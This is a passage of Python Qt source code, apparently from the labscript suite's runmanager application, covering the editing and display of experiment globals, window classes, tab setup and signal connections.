# same name (though the rename code with throw an error and revert
# it).
possible_name_items = [item for item in possible_name_items
if item.data(self.GLOBALS_ROLE_PREVIOUS_TEXT) == previous_name]
elif global_name != self.GLOBALS_DUMMY_ROW_TEXT:
# Don't return the dummy item unless they asked for it explicitly
# - if a new global is being created, its name might be
# simultaneously present in its own row and the dummy row too.
possible_name_items = [item for item in possible_name_items
if not item.data(self.GLOBALS_ROLE_IS_DUMMY_ROW)]
if len(possible_name_items) > 1:
raise LookupError('Multiple items found')
elif not possible_name_items:
raise LookupError('No item found')
name_item = possible_name_items[0]
name_index = name_item.index()
# Found the name item, get the sibling item for the column requested:
item_index = name_index.sibling(name_index.row(), column)
item = self.globals_model.itemFromIndex(item_index)
return item
def do_model_sort(self):
header = self.ui.tableView_globals.horizontalHeader()
sort_column = header.sortIndicatorSection()
sort_order = header.sortIndicatorOrder()
self.ui.tableView_globals.sortByColumn(sort_column, sort_order)
def new_global(self, global_name):
logger.info('%s:%s - new global: %s', self.globals_file, self.group_name, global_name)
item = self.get_global_item_by_name(global_name, self.GLOBALS_COL_NAME,
previous_name=self.GLOBALS_DUMMY_ROW_TEXT)
try:
runmanager.new_global(self.globals_file, self.group_name, global_name)
except Exception as e:
error_dialog(str(e))
else:
# Insert the newly created global into the model:
global_row = self.make_global_row(global_name)
last_index = self.globals_model.rowCount()
# Insert it as the row before the last (dummy) row:
self.globals_model.insertRow(last_index - 1, global_row)
self.do_model_sort()
# Go into edit mode on the 'value' item:
value_item = self.get_global_item_by_name(global_name, self.GLOBALS_COL_VALUE,
previous_name=global_name)
value_item_index = value_item.index()
self.ui.tableView_globals.setCurrentIndex(value_item_index)
self.ui.tableView_globals.edit(value_item_index)
self.globals_changed()
finally:
# Set the dummy row's text back ready for another group to be created:
item.setText(self.GLOBALS_DUMMY_ROW_TEXT)
def rename_global(self, previous_global_name, new_global_name):
logger.info('%s:%s - rename global: %s -> %s',
self.globals_file, self.group_name, previous_global_name, new_global_name)
item = self.get_global_item_by_name(new_global_name, self.GLOBALS_COL_NAME,
previous_name=previous_global_name)
try:
runmanager.rename_global(self.globals_file, self.group_name, previous_global_name, new_global_name)
except Exception as e:
error_dialog(str(e))
# Set the item text back to the old name, since the rename failed:
item.setText(previous_global_name)
else:
item.setData(new_global_name, self.GLOBALS_ROLE_PREVIOUS_TEXT)
item.setData(new_global_name, self.GLOBALS_ROLE_SORT_DATA)
self.do_model_sort()
item.setToolTip(new_global_name)
self.globals_changed()
value_item = self.get_global_item_by_name(new_global_name, self.GLOBALS_COL_VALUE)
value = value_item.text()
if not value and self.ui.tableView_globals.state() != QtWidgets.QAbstractItemView.EditingState:
# Go into editing the value item automatically if not already in edit mode:
value_item_index = value_item.index()
self.ui.tableView_globals.setCurrentIndex(value_item_index)
self.ui.tableView_globals.edit(value_item_index)
else:
# If this changed the sort order, ensure the item is still visible:
scroll_view_to_row_if_current(self.ui.tableView_globals, item)
def change_global_value(self, global_name, previous_value, new_value, interactive=True):
logger.info('%s:%s - change global value: %s = %s -> %s' %
(self.globals_file, self.group_name, global_name, previous_value, new_value))
item = self.get_global_item_by_name(global_name, self.GLOBALS_COL_VALUE)
if not interactive:
# Value was not set interactively by the user, it is up to us to set it:
with self.globals_model_item_changed_disconnected:
item.setText(new_value)
previous_background = item.background()
previous_icon = item.icon()
item.setData(new_value, self.GLOBALS_ROLE_PREVIOUS_TEXT)
item.setData(new_value, self.GLOBALS_ROLE_SORT_DATA)
item.setData(None, QtCore.Qt.BackgroundRole)
item.setIcon(QtGui.QIcon(':qtutils/fugue/hourglass'))
args = global_name, previous_value, new_value, item, previous_background, previous_icon
if interactive:
QtCore.QTimer.singleShot(1, lambda: self.complete_change_global_value(*args))
else:
self.complete_change_global_value(*args, interactive=False)
def complete_change_global_value(self, global_name, previous_value, new_value, item, previous_background, previous_icon, interactive=True):
try:
runmanager.set_value(self.globals_file, self.group_name, global_name, new_value)
except Exception as e:
if interactive:
error_dialog(str(e))
# Set the item text back to the old name, since the change failed:
with self.globals_model_item_changed_disconnected:
item.setText(previous_value)
item.setData(previous_value, self.GLOBALS_ROLE_PREVIOUS_TEXT)
item.setData(previous_value, self.GLOBALS_ROLE_SORT_DATA)
item.setData(previous_background, QtCore.Qt.BackgroundRole)
item.setIcon(previous_icon)
if not interactive:
raise
else:
self.check_for_boolean_values(item)
self.do_model_sort()
item.setToolTip('Evaluating...')
self.globals_changed()
if not interactive:
return
units_item = self.get_global_item_by_name(global_name, self.GLOBALS_COL_UNITS)
units = units_item.text()
if not units and self.ui.tableView_globals.state() != QtWidgets.QAbstractItemView.EditingState:
# Go into editing the units item automatically if not already in edit mode:
units_item_index = units_item.index()
self.ui.tableView_globals.setCurrentIndex(units_item_index)
self.ui.tableView_globals.edit(units_item_index)
else:
# If this changed the sort order, ensure the item is still visible:
scroll_view_to_row_if_current(self.ui.tableView_globals, item)
def change_global_units(self, global_name, previous_units, new_units):
logger.info('%s:%s - change units: %s = %s -> %s' %
(self.globals_file, self.group_name, global_name, previous_units, new_units))
item = self.get_global_item_by_name(global_name, self.GLOBALS_COL_UNITS)
try:
runmanager.set_units(self.globals_file, self.group_name, global_name, new_units)
except Exception as e:
error_dialog(str(e))
# Set the item text back to the old units, since the change failed:
item.setText(previous_units)
else:
item.setData(new_units, self.GLOBALS_ROLE_PREVIOUS_TEXT)
item.setData(new_units, self.GLOBALS_ROLE_SORT_DATA)
self.do_model_sort()
# If this changed the sort order, ensure the item is still visible:
scroll_view_to_row_if_current(self.ui.tableView_globals, item)
def change_global_expansion(self, global_name, previous_expansion, new_expansion):
logger.info('%s:%s - change expansion: %s = %s -> %s' %
(self.globals_file, self.group_name, global_name, previous_expansion, new_expansion))
item = self.get_global_item_by_name(global_name, self.GLOBALS_COL_EXPANSION)
try:
runmanager.set_expansion(self.globals_file, self.group_name, global_name, new_expansion)
except Exception as e:
error_dialog(str(e))
# Set the item text back to the old units, since the change failed:
item.setText(previous_expansion)
else:
item.setData(new_expansion, self.GLOBALS_ROLE_PREVIOUS_TEXT)
item.setData(new_expansion, self.GLOBALS_ROLE_SORT_DATA)
self.do_model_sort()
self.globals_changed()
# If this changed the sort order, ensure the item is still visible:
scroll_view_to_row_if_current(self.ui.tableView_globals, item)
def check_for_boolean_values(self, item):
"""Checks if the value is 'True' or 'False'. If either, makes the
units cell checkable, uneditable, and coloured to indicate the state.
The units cell can then be clicked to toggle the value."""
index = item.index()
value = item.text()
name_index = index.sibling(index.row(), self.GLOBALS_COL_NAME)
units_index = index.sibling(index.row(), self.GLOBALS_COL_UNITS)
name_item = self.globals_model.itemFromIndex(name_index)
units_item = self.globals_model.itemFromIndex(units_index)
global_name = name_item.text()
logger.debug('%s:%s - check for boolean values: %s' %
(self.globals_file, self.group_name, global_name))
if value == 'True':
units_item.setData(True, self.GLOBALS_ROLE_IS_BOOL)
units_item.setText('Bool')
units_item.setData('!1', self.GLOBALS_ROLE_SORT_DATA)
units_item.setEditable(False)
units_item.setCheckState(QtCore.Qt.Checked)
units_item.setBackground(QtGui.QBrush(QtGui.QColor(self.COLOR_BOOL_ON)))
elif value == 'False':
units_item.setData(True, self.GLOBALS_ROLE_IS_BOOL)
units_item.setText('Bool')
units_item.setData('!0', self.GLOBALS_ROLE_SORT_DATA)
units_item.setEditable(False)
units_item.setCheckState(QtCore.Qt.Unchecked)
units_item.setBackground(QtGui.QBrush(QtGui.QColor(self.COLOR_BOOL_OFF)))
else:
was_bool = units_item.data(self.GLOBALS_ROLE_IS_BOOL)
units_item.setData(False, self.GLOBALS_ROLE_IS_BOOL)
units_item.setEditable(True)
# Checkbox still visible unless we do the following:
units_item.setData(None, QtCore.Qt.CheckStateRole)
units_item.setData(None, QtCore.Qt.BackgroundRole)
if was_bool:
# If the item was a bool and now isn't, clear the
# units and go into editing so the user can enter a
# new units string:
units_item.setText('')
self.ui.tableView_globals.setCurrentIndex(units_item.index())
self.ui.tableView_globals.edit(units_item.index())
def globals_changed(self):
"""Called whenever something about a global has changed. call
app.globals_changed to inform the main application that it needs to
parse globals again. self.update_parse_indication will be called by
the main app when parsing is done, and will set the colours and
tooltips appropriately"""
# Tell the main app about it:
app.globals_changed()
def delete_global(self, global_name, confirm=True):
logger.info('%s:%s - delete global: %s' %
(self.globals_file, self.group_name, global_name))
if confirm:
if not question_dialog("Delete the global '%s'?" % global_name):
return
runmanager.delete_global(self.globals_file, self.group_name, global_name)
# Find the entry for this global in self.globals_model and remove it:
name_item = self.get_global_item_by_name(global_name, self.GLOBALS_COL_NAME)
self.globals_model.removeRow(name_item.row())
self.globals_changed()
def update_parse_indication(self, active_groups, sequence_globals, evaled_globals):
# Check that we are an active group:
if self.group_name in active_groups and active_groups[self.group_name] == self.globals_file:
self.tab_contains_errors = False
# for global_name, value in evaled_globals[self.group_name].items():
for i in range(self.globals_model.rowCount()):
name_item = self.globals_model.item(i, self.GLOBALS_COL_NAME)
if name_item.data(self.GLOBALS_ROLE_IS_DUMMY_ROW):
continue
value_item = self.globals_model.item(i, self.GLOBALS_COL_VALUE)
expansion_item = self.globals_model.item(i, self.GLOBALS_COL_EXPANSION)
# value_item = self.get_global_item_by_name(global_name, self.GLOBALS_COL_VALUE)
# expansion_item = self.get_global_item_by_name(global_name, self.GLOBALS_COL_EXPANSION)
global_name = name_item.text()
value = evaled_globals[self.group_name][global_name]
ignore, ignore, expansion = sequence_globals[self.group_name][global_name]
# Temporarily disconnect the item_changed signal on the model
# so that we can set the expansion type without triggering
# another preparse - the parsing has already been done with
# the new expansion type.
with self.globals_model_item_changed_disconnected:
if expansion_item.data(self.GLOBALS_ROLE_PREVIOUS_TEXT) != expansion:
# logger.info('expansion previous text set')
expansion_item.setData(expansion, self.GLOBALS_ROLE_PREVIOUS_TEXT)
if expansion_item.data(self.GLOBALS_ROLE_SORT_DATA) != expansion:
# logger.info('sort data role set')
expansion_item.setData(expansion, self.GLOBALS_ROLE_SORT_DATA)
# The next line will now trigger item_changed, but it will not
# be detected as an actual change to the expansion type,
# because previous_text will match text. So it will not look
# like a change and will not trigger preparsing. However It is
# still important that other triggers be processed, such as
# setting the icon in the expansion item, so that will still
# occur in the callback.
expansion_item.setText(expansion)
if isinstance(value, Exception):
value_item.setBackground(QtGui.QBrush(QtGui.QColor(self.COLOR_ERROR)))
value_item.setIcon(QtGui.QIcon(':qtutils/fugue/exclamation'))
tooltip = '%s: %s' % (value.__class__.__name__, str(value))
self.tab_contains_errors = True
else:
if value_item.background().color().name().lower() != self.COLOR_OK.lower():
value_item.setBackground(QtGui.QBrush(QtGui.QColor(self.COLOR_OK)))
if not value_item.icon().isNull():
# logger.info('clearing icon')
value_item.setData(None, QtCore.Qt.DecorationRole)
tooltip = repr(value)
if value_item.toolTip() != tooltip:
# logger.info('tooltip_changed')
value_item.setToolTip(tooltip)
if self.tab_contains_errors:
self.set_tab_icon(':qtutils/fugue/exclamation')
else:
self.set_tab_icon(None)
else:
# Clear everything:
self.set_tab_icon(None)
for row in range(self.globals_model.rowCount()):
item = self.globals_model.item(row, self.GLOBALS_COL_VALUE)
if item.data(self.GLOBALS_ROLE_IS_DUMMY_ROW):
continue
item.setData(None, QtCore.Qt.DecorationRole)
item.setToolTip('Group inactive')
item.setData(None, QtCore.Qt.BackgroundRole)
class RunmanagerMainWindow(QtWidgets.QMainWindow):
# A signal to show that the window is shown and painted.
firstPaint = Signal()
# A signal for when the window manager has created a new window for this widget:
newWindow = Signal(int)
def __init__(self, *args, **kwargs):
QtWidgets.QMainWindow.__init__(self, *args, **kwargs)
self._previously_painted = False
def closeEvent(self, event):
if app.on_close_event():
return QtWidgets.QMainWindow.closeEvent(self, event)
else:
event.ignore()
def event(self, event):
result = QtWidgets.QMainWindow.event(self, event)
if event.type() == QtCore.QEvent.WinIdChange:
self.newWindow.emit(self.effectiveWinId())
return result
def paintEvent(self, event):
result = QtWidgets.QMainWindow.paintEvent(self, event)
if not self._previously_painted:
self._previously_painted = True
self.firstPaint.emit()
return result
class PoppedOutOutputBoxWindow(QtWidgets.QDialog):
# A signal for when the window manager has created a new window for this widget:
newWindow = Signal(int)
def closeEvent(self, event):
app.on_output_popout_button_clicked()
def event(self, event):
result = QtWidgets.QDialog.event(self, event)
if event.type() == QtCore.QEvent.WinIdChange:
self.newWindow.emit(self.effectiveWinId())
return result
class RunManager(object):
# Constants for the model in the axes tab:
AXES_COL_NAME = 0
AXES_COL_LENGTH = 1
AXES_COL_SHUFFLE = 2
AXES_ROLE_NAME = QtCore.Qt.UserRole + 1
# Constants for the model in the groups tab:
GROUPS_COL_NAME = 0
GROUPS_COL_ACTIVE = 1
GROUPS_COL_DELETE = 2
GROUPS_COL_OPENCLOSE = 3
GROUPS_ROLE_IS_DUMMY_ROW = QtCore.Qt.UserRole + 1
GROUPS_ROLE_PREVIOUS_NAME = QtCore.Qt.UserRole + 2
GROUPS_ROLE_SORT_DATA = QtCore.Qt.UserRole + 3
GROUPS_ROLE_GROUP_IS_OPEN = QtCore.Qt.UserRole + 4
GROUPS_DUMMY_ROW_TEXT = '<Click to add group>'
def __init__(self):
splash.update_text('loading graphical interface')
loader = UiLoader()
loader.registerCustomWidget(FingerTabWidget)
loader.registerCustomWidget(TreeView)
self.ui = loader.load('main.ui', RunmanagerMainWindow())
self.output_box = OutputBox(self.ui.verticalLayout_output_tab)
# Add a 'pop-out' button to the output tab:
output_tab_index = self.ui.tabWidget.indexOf(self.ui.tab_output)
self.output_popout_button = TabToolButton(self.ui.tabWidget.parent())
self.output_popout_button.setIcon(QtGui.QIcon(':/qtutils/fugue/arrow-out'))
self.output_popout_button.setToolTip('Toggle whether the output box is in a separate window')
self.ui.tabWidget.tabBar().setTabButton(output_tab_index, QtWidgets.QTabBar.RightSide, self.output_popout_button)
# Fix the first three tabs in place:
for index in range(3):
self.ui.tabWidget.tabBar().setMovable(False, index=index)
# Whether or not the output box is currently popped out:
self.output_box_is_popped_out = False
# The window it will be moved to when popped out:
self.output_box_window = PoppedOutOutputBoxWindow(self.ui, QtCore.Qt.WindowSystemMenuHint)
self.output_box_window_verticalLayout = QtWidgets.QVBoxLayout(self.output_box_window)
self.output_box_window_verticalLayout.setContentsMargins(0, 0, 0, 0)
self.output_box_window.setWindowTitle('runmanager output')
self.output_box_window.resize(800, 1000)
self.setup_config()
self.setup_axes_tab()
self.setup_groups_tab()
self.connect_signals()
# The last location from which a labscript file was selected, defaults
# to labscriptlib:
self.last_opened_labscript_folder = self.exp_config.get('paths', 'labscriptlib')
# The last location from which a globals file was selected, defaults
# to experiment_shot_storage:
self.last_opened_globals_folder = self.exp_config.get('paths', 'experiment_shot_storage')
# The last file to which the user saved or loaded a configuration:
self.last_save_config_file = None
# The last manually selected shot output folder, defaults to
# experiment_shot_storage:
self.last_selected_shot_output_folder = self.exp_config.get('paths', 'experiment_shot_storage')
self.shared_drive_prefix = self.exp_config.get('paths', 'shared_drive')
self.experiment_shot_storage = self.exp_config.get('paths', 'experiment_shot_storage')
# Store the currently open groups as {(globals_filename, group_name): GroupTab}
self.currently_open_groups = {}
# A thread that will evaluate globals when they change, allowing us to
# show their values and any errors in the tabs they came from.
self.preparse_globals_thread = threading.Thread(target=self.preparse_globals_loop)
self.preparse_globals_thread.daemon = True
# A Queue for informing the preparser thread when globals have changed, and thus
# need parsing again. It is a queue rather than a threading.Event() so that
# callers can call Queue.join() to wait for parsing to complete in a race-free
# way
self.preparse_globals_required = queue.Queue()
self.preparse_globals_thread.start()
# A flag telling the compilation thread to abort:
self.compilation_aborted = threading.Event()
# A few attributes for self.guess_expansion_modes() to keep track of
# its state, and thus detect changes:
self.previous_evaled_globals = {}
self.previous_global_hierarchy = {}
self.previous_expansion_types = {}
self.previous_expansions = {}
# The prospective number of shots resulting from compilation
self.n_shots = None
# Start the loop that allows compilations to be queued up:
self.compile_queue = queue.Queue()
self.compile_queue_thread = threading.Thread(target=self.compile_loop)
self.compile_queue_thread.daemon = True
self.compile_queue_thread.start()
splash.update_text('starting compiler subprocess')
# Start the compiler subprocess:
self.to_child, self.from_child, self.child = process_tree.subprocess(
'batch_compiler.py', output_redirection_port=self.output_box.port
)
# Is blank until a labscript file is selected:
self.previous_default_output_folder = ''
# Start a thread to monitor the time of day and create new shot output
# folders for each day:
inthread(self.rollover_shot_output_folder)
self.non_default_folder = None
# The data from the last time we saved the configuration, so we can
# know if something's changed:
self.last_save_data = None
# autoload a config file, if labconfig is set to do so:
try:
autoload_config_file = self.exp_config.get('runmanager', 'autoload_config_file')
except (LabConfig.NoOptionError, LabConfig.NoSectionError):
self.output_box.output('Ready.\n\n')
else:
self.ui.setEnabled(False)
self.output_box.output('Loading default config file %s...' % autoload_config_file)
def load_the_config_file():
try:
self.load_configuration(autoload_config_file)
self.output_box.output('done.\n')
except Exception as e:
self.output_box.output('\nCould not load config file: %s: %s\n\n' %
(e.__class__.__name__, str(e)), red=True)
else:
self.output_box.output('Ready.\n\n')
finally:
self.ui.setEnabled(True)
# Defer this until 50ms after the window has shown,
# so that the GUI pops up faster in the meantime
self.ui.firstPaint.connect(lambda: QtCore.QTimer.singleShot(50, load_the_config_file))
splash.update_text('done')
self.ui.show()
def setup_config(self):
required_config_params = {"DEFAULT": ["experiment_name"],
"programs": ["text_editor",
"text_editor_arguments",
],
"ports": ['BLACS', 'runviewer'],
"paths": ["shared_drive",
"experiment_shot_storage",
"labscriptlib",
],
}
self.exp_config = LabConfig(required_params = required_config_params)
def setup_axes_tab(self):
self.axes_model = QtGui.QStandardItemModel()
# Setup the model columns and link to the treeview
name_header_item = QtGui.QStandardItem('Name')
name_header_item.setToolTip('The name of the global or zip group being iterated over')
self.axes_model.setHorizontalHeaderItem(self.AXES_COL_NAME, name_header_item)
length_header_item = QtGui.QStandardItem('Length')
length_header_item.setToolTip('The number of elements in the axis of the parameter space')
self.axes_model.setHorizontalHeaderItem(self.AXES_COL_LENGTH, length_header_item)
shuffle_header_item = QtGui.QStandardItem('Shuffle')
shuffle_header_item.setToolTip('Whether or not the order of the axis should be randomised')
shuffle_header_item.setIcon(QtGui.QIcon(':qtutils/fugue/arrow-switch'))
self.axes_model.setHorizontalHeaderItem(self.AXES_COL_SHUFFLE, shuffle_header_item)
self.ui.treeView_axes.setModel(self.axes_model)
# Setup stuff for a custom context menu:
self.ui.treeView_axes.setContextMenuPolicy(QtCore.Qt.CustomContextMenu)
# Make the actions for the context menu:
self.action_axes_check_selected = QtWidgets.QAction(QtGui.QIcon(':qtutils/fugue/ui-check-box'),
'Check selected', self.ui)
self.action_axes_uncheck_selected = QtWidgets.QAction(QtGui.QIcon(':qtutils/fugue/ui-check-box-uncheck'),
'Uncheck selected', self.ui)
# setup header widths
self.ui.treeView_axes.header().setStretchLastSection(False)
self.ui.treeView_axes.header().setSectionResizeMode(self.AXES_COL_NAME, QtWidgets.QHeaderView.Stretch)
def setup_groups_tab(self):
self.groups_model = QtGui.QStandardItemModel()
self.groups_model.setHorizontalHeaderLabels(['File/group name', 'Active', 'Delete', 'Open/Close'])
self.groups_model.setSortRole(self.GROUPS_ROLE_SORT_DATA)
self.ui.treeView_groups.setModel(self.groups_model)
self.ui.treeView_groups.setAnimated(True) # Pretty
self.ui.treeView_groups.setSelectionMode(QtWidgets.QTreeView.ExtendedSelection)
self.ui.treeView_groups.setSortingEnabled(True)
self.ui.treeView_groups.sortByColumn(self.GROUPS_COL_NAME, QtCore.Qt.AscendingOrder)
# Set column widths:
self.ui.treeView_groups.setColumnWidth(self.GROUPS_COL_NAME, 400)
# Make it so the user can just start typing on an item to edit:
self.ui.treeView_groups.setEditTriggers(QtWidgets.QTreeView.AnyKeyPressed |
QtWidgets.QTreeView.EditKeyPressed |
QtWidgets.QTreeView.SelectedClicked)
# Ensure the clickable region of the open/close button doesn't extend forever:
self.ui.treeView_groups.header().setStretchLastSection(False)
# Stretch the filpath/groupname column to fill available space:
self.ui.treeView_groups.header().setSectionResizeMode(
self.GROUPS_COL_NAME, QtWidgets.QHeaderView.Stretch
)
# Shrink columns other than the 'name' column to the size of their headers:
for column in range(self.groups_model.columnCount()):
if column != self.GROUPS_COL_NAME:
self.ui.treeView_groups.resizeColumnToContents(column)
self.ui.treeView_groups.setTextElideMode(QtCore.Qt.ElideMiddle)
# Setup stuff for a custom context menu:
self.ui.treeView_groups.setContextMenuPolicy(QtCore.Qt.CustomContextMenu)
# Make the actions for the context menu:
self.action_groups_set_selection_active = QtWidgets.QAction(
QtGui.QIcon(':qtutils/fugue/ui-check-box'), 'Set selected group(s) active', self.ui)
self.action_groups_set_selection_inactive = QtWidgets.QAction(
QtGui.QIcon(':qtutils/fugue/ui-check-box-uncheck'), 'Set selected group(s) inactive', self.ui)
self.action_groups_delete_selected = QtWidgets.QAction(
QtGui.QIcon(':qtutils/fugue/minus'), 'Delete selected group(s)', self.ui)
self.action_groups_open_selected = QtWidgets.QAction(
QtGui.QIcon(':/qtutils/fugue/plus'), 'Open selected group(s)', self.ui)
self.action_groups_close_selected_groups = QtWidgets.QAction(
QtGui.QIcon(':/qtutils/fugue/cross'), 'Close selected group(s)', self.ui)
self.action_groups_close_selected_files = QtWidgets.QAction(
QtGui.QIcon(':/qtutils/fugue/cross'), 'Close selected file(s)', self.ui)
# A counter for keeping track of the recursion depth of
# self._groups_model_active_changed(). This is used so that some
# actions can be taken in response to initial data changes, but not to
# flow-on changes made by the method itself:
self.on_groups_model_active_changed_recursion_depth = 0
def connect_signals(self):
# The button that pops the output box in and out:
self.output_popout_button.clicked.connect(self.on_output_popout_button_clicked)
# The menu items:
self.ui.actionLoad_configuration.triggered.connect(self.on_load_configuration_triggered)
self.ui.actionRevert_configuration.triggered.connect(self.on_revert_configuration_triggered)
self.ui.actionSave_configuration.triggered.connect(self.on_save_configuration_triggered)
self.ui.actionSave_configuration_as.triggered.connect(self.on_save_configuration_as_triggered)
self.ui.actionQuit.triggered.connect(self.ui.close)
# labscript file and folder selection stuff:
self.ui.toolButton_select_labscript_file.clicked.connect(self.on_select_labscript_file_clicked)
self.ui.toolButton_select_shot_output_folder.clicked.connect(self.on_select_shot_output_folder_clicked)
self.ui.toolButton_edit_labscript_file.clicked.connect(self.on_edit_labscript_file_clicked)
self.ui.toolButton_reset_shot_output_folder.clicked.connect(self.on_reset_shot_output_folder_clicked)
self.ui.lineEdit_labscript_file.textChanged.connect(self.on_labscript_file_text_changed)
self.ui.lineEdit_shot_output_folder.textChanged.connect(self.on_shot_output_folder_text_changed)
# Control buttons; engage, abort, restart subprocess:
self.ui.pushButton_engage.clicked.connect(self.on_engage_clicked)
self.ui.pushButton_abort.clicked.connect(self.on_abort_clicked)
self.ui.pushButton_restart_subprocess.clicked.connect(self.on_restart_subprocess_clicked)
# shuffle master control
self.ui.pushButton_shuffle.stateChanged.connect(self.on_master_shuffle_clicked)
# Tab closebutton clicked:
self.ui.tabWidget.tabCloseRequested.connect(self.on_tabCloseRequested)
# Axes tab; right click menu, menu actions, reordering
# self.ui.treeView_axes.customContextMenuRequested.connect(self.on_treeView_axes_context_menu_requested)
self.action_axes_check_selected.triggered.connect(self.on_axes_check_selected_triggered)
self.action_axes_uncheck_selected.triggered.connect(self.on_axes_uncheck_selected_triggered)
self.ui.toolButton_axis_to_top.clicked.connect(self.on_axis_to_top_clicked)
self.ui.toolButton_axis_up.clicked.connect(self.on_axis_up_clicked)
self.ui.toolButton_axis_down.clicked.connect(self.on_axis_down_clicked)
self.ui.toolButton_axis_to_bottom.clicked.connect(self.on_axis_to_bottom_clicked)
# axes tab item changed handler
self.axes_model.itemChanged.connect(self.on_axes_item_changed)
self.axes_model.rowsRemoved.connect(self.update_global_shuffle_state)
self.axes_model.rowsInserted.connect(self.update_global_shuffle_state)
# Groups tab; right click menu, menu actions, open globals file, new globals file, diff globals file,
self.ui.treeView_groups.customContextMenuRequested.connect(self.on_treeView_groups_context_menu_requested)
self.action_groups_set_selection_active.triggered.connect(
lambda: self.on_groups_set_selection_active_triggered(QtCore.Qt.Checked))
self.action_groups_set_selection_inactive.triggered.connect(
lambda: self.on_groups_set_selection_active_triggered(QtCore.Qt.Unchecked))
self.action_groups_delete_selected.triggered.connect(self.on_groups_delete_selected_triggered)
self.action_groups_open_selected.triggered.connect(self.on_groups_open_selected_triggered)
self.action_groups_close_selected_groups.triggered.connect(self.on_groups_close_selected_groups_triggered)
self.action_groups_close_selected_files.triggered.connect(self.on_groups_close_selected_files_triggered)
self.ui.pushButton_open_globals_file.clicked.connect(self.on_open_globals_file_clicked)
self.ui.pushButton_new_globals_file.clicked.connect(self.on_new_globals_file_clicked)
self.ui.pushButton_diff_globals_file.clicked.connect(self.on_diff_globals_file_clicked)
self.ui.treeView_groups.leftClicked.connect(self.on_treeView_groups_leftClicked)
self.ui.treeView_groups.doubleLeftClicked.connect(self.on_treeView_groups_doubleLeftClicked)
self.groups_model.itemChanged.connect(self.on_groups_model_item_changed)
# A context manager with which we can temporarily disconnect the above connection.
self.groups_model_item_changed_disconnected = DisconnectContextManager(
self.groups_model.itemChanged, self.on_groups_model_item_changed)
# Keyboard shortcuts:
engage_shortcut = QtWidgets.QShortcut('F5', self.ui,
lambda: self.ui.pushButton_engage.clicked.emit(False))
engage_shortcut.setAutoRepeat(False)
QtWidgets.QShortcut('ctrl+W', self.ui, self.close_current_tab)
QtWidgets.QShortcut('ctrl+Tab', self.ui, lambda: self.switch_tabs(+1))
QtWidgets.QShortcut('ctrl+shift+Tab', self.ui, lambda: self.switch_tabs(-1))
# Tell Windows how to handle our windows in the the taskbar, making pinning work properly and stuff:
if os.name == 'nt':
self.ui.newWindow.connect(set_win_appusermodel)
self.output_box_window.newWindow.connect(set_win_appusermodel)
def on_close_event(self):
save_data = self.get_save_data()
if self.last_save_data is not None and save_data != self.last_save_data:
message = ('Current configuration (which groups are active/open and other GUI state) '
'has changed: save config file \'%s\'?' % self.last_save_config_file)
reply = QtWidgets.QMessageBox.question(self.ui, 'Quit runmanager', message,
QtWidgets.QMessageBox.Yes | QtWidgets.QMessageBox.No | QtWidgets.QMessageBox.Cancel)
if reply == QtWidgets.QMessageBox.Cancel:
return False
if reply == QtWidgets.QMessageBox.Yes:
self.save_configuration(self.last_save_config_file)
self.to_child.put(['quit', None])
return True
def close_current_tab(self):
current_tab_widget = self.ui.tabWidget.currentWidget()
for (globals_file, group_name), tab in self.currently_open_groups.items():
if tab.ui is current_tab_widget:
self.close_group(globals_file, group_name)
def switch_tabs(self, change):
current_index = self.ui.tabWidget.currentIndex()
n_tabs = self.ui.tabWidget.count()
new_index = (current_index + change) % n_tabs
self.ui.tabWidget.setCurrentIndex(new_index)
def on_output_popout_button_clicked(self):
if self.output_box_is_popped_out:
self.ui.verticalLayout_output_tab.addWidget(self.output_box.output_textedit)
self.output_box_window.hide()
self.output_popout_button.setIcon(QtGui.QIcon(':/qtutils/fugue/arrow-out'))
else:
# pop it out
# self.ui.verticalLayout_output_tab.remove(self.output_box)
self.output_box_window_verticalLayout.addWidget(self.output_box.output_textedit)
self.output_popout_button.setIcon(QtGui.QIcon(':/qtutils/fugue/arrow-in'))
self.output_box_window.show()
self.output_box_is_popped_out = not self.output_box_is_popped_out
def on_select_labscript_file_clicked(self, checked):
labscript_file = QtWidgets.QFileDialog.getOpenFileName(self.ui,
'Select labscript file',
self.last_opened_labscript_folder,
"Python files (*.py)")
if type(labscript_file) is tuple:
labscript_file, _ = labscript_file
if not labscript_file:
# User cancelled selection
return
# Convert to standard platform specific path, otherwise Qt likes forward slashes:
labscript_file = os.path.abspath(labscript_file)
if not os.path.isfile(labscript_file):
error_dialog("No such file %s." % labscript_file)
return
# Save the containing folder for use next time we open the dialog box:
self.last_opened_labscript_folder = os.path.dirname(labscript_file)
# Write the file to the lineEdit:
self.ui.lineEdit_labscript_file.setText(labscript_file)
# Check if the output folder needs to be updated:
self.check_output_folder_update()
def on_edit_labscript_file_clicked(self, checked):
# get path to text editor
editor_path = self.exp_config.get('programs', 'text_editor')
editor_args = self.exp_config.get('programs', 'text_editor_arguments')
# Get the current labscript file:
current_labscript_file = self.ui.lineEdit_labscript_file.text()
# Ignore if no file selected
if not current_labscript_file:
return
if not editor_path:
error_dialog("No editor specified in the labconfig.")
if '{file}' in editor_args:
# Split the args on spaces into a list, replacing {file} with the labscript file
editor_args = [arg if arg != '{file}' else current_labscript_file for arg in editor_args.split()]
else:
# Otherwise if {file} isn't already in there, append it to the other args:
editor_args = [current_labscript_file] + editor_args.split()
try:
subprocess.Popen([editor_path] + editor_args)
except Exception as e:
error_dialog("Unable to launch text editor specified in %s. Error was: %s" %
(self.exp_config.config_path, str(e)))
def on_select_shot_output_folder_clicked(self, checked):
shot_output_folder = QtWidgets.QFileDialog.getExistingDirectory(self.ui,
'Select shot output folder',
self.last_selected_shot_output_folder)
if type(shot_output_folder) is tuple:
shot_output_folder, _ = shot_output_folder
if not shot_output_folder:
# User cancelled selection
return
# Convert to standard platform specific path, otherwise Qt likes forward slashes:
shot_output_folder = os.path.abspath(shot_output_folder)
# Save the containing folder for use next time we open the dialog box:
self.last_selected_shot_output_folder = os.path.dirname(shot_output_folder)
# Write the file to the lineEdit:
self.ui.lineEdit_shot_output_folder.setText(shot_output_folder)
# Update our knowledge about whether this is the default output folder or not:
self.check_output_folder_update()
def on_reset_shot_output_folder_clicked(self, checked):
current_default_output_folder = self.get_default_output_folder()
if current_default_output_folder is None:
return
self.ui.lineEdit_shot_output_folder.setText(current_default_output_folder)
self.check_output_folder_update()
def on_labscript_file_text_changed(self, text):
# Blank out the 'edit labscript file' button if no labscript file is
# selected
enabled = bool(text)
self.ui.toolButton_edit_labscript_file.setEnabled(enabled)
# Blank out the 'select shot output folder' button if no labscript
# file is selected:
self.ui.toolButton_select_shot_output_folder.setEnabled(enabled)
